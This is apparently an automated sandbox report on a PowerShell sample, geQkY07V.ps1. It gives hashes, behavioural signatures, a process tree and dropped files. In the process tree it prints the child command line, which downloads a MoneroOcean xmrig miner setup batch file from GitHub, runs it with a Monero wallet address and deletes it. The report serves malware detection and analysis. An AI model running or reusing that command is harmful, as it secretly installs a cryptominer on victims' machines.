Analysis

- max time kernel: 31s
- max time network: 34s
- platform: windows7_x64
- resource: win7-20230621-en
- resource tags: arch:x64, arch:x86, image:win7-20230621-en, locale:en-us, os:windows7-x64, system
- submitted: 30/06/2023, 12:44
Static task: static1

Behavioral task: behavioral1
- Sample: geQkY07V.ps1
- Resource: win7-20230621-en

Behavioral task: behavioral2
- Sample: geQkY07V.ps1
- Resource: win10v2004-20230621-en
General

- Target: geQkY07V.ps1
- Size: 393B
- MD5: b36331be1b1deb5bb4701a7cdd75e68a
- SHA1: 72cc0986a6abb77f1e3cadece22e3170731b0704
- SHA256: 0cf956f28571a4236d37ba1811d9d484e7848dc52ff5e9dc44c27b330621ef78
- SHA512: 8636cea76328d04911b029e0b3c15d8cea77d8724a1bca94c4885119ca98060b6b9e3ad4064d6d797146e28c38e4d0c063aec08b90f62302e4ff5332f77abc84
Malware Config

Signatures

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1712  powershell.exe
  652   powershell.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1712  powershell.exe
  Token: SeDebugPrivilege  652   powershell.exe

- Suspicious use of WriteProcessMemory (3 IoCs)
  description                      pid   Process         procid_target
  PID 1712 wrote to memory of 652  1712  powershell.exe  29
  (the same entry is recorded three times in the report)
Processes

- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\geQkY07V.ps1
  PID: 1712
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1712)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " = New-Object System.Net.WebClient; = [System.IO.Path]::GetTempFileName(); += '.bat'; .DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', ); & 48DLDM8j9npYi4jN9NaAWPbTDkA2uT7TUGCciLMwX3hdTmqauo9mismgfteSQiZMbjjgEDf6kDEKASnHwWZqMV6e1WaS8ZN; Remove-Item -Force "
    PID: 652
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 620973f41fe888925be4635077f5e0af
  SHA1: eab7b16af4798a2f92a69ce672fd75b8a8bfa34e
  SHA256: 2119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a
  SHA512: 8d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5A7NBGM19RGJ076NDY78.temp
  Filesize: 7KB
  MD5: 620973f41fe888925be4635077f5e0af
  SHA1: eab7b16af4798a2f92a69ce672fd75b8a8bfa34e
  SHA256: 2119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a
  SHA512: 8d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2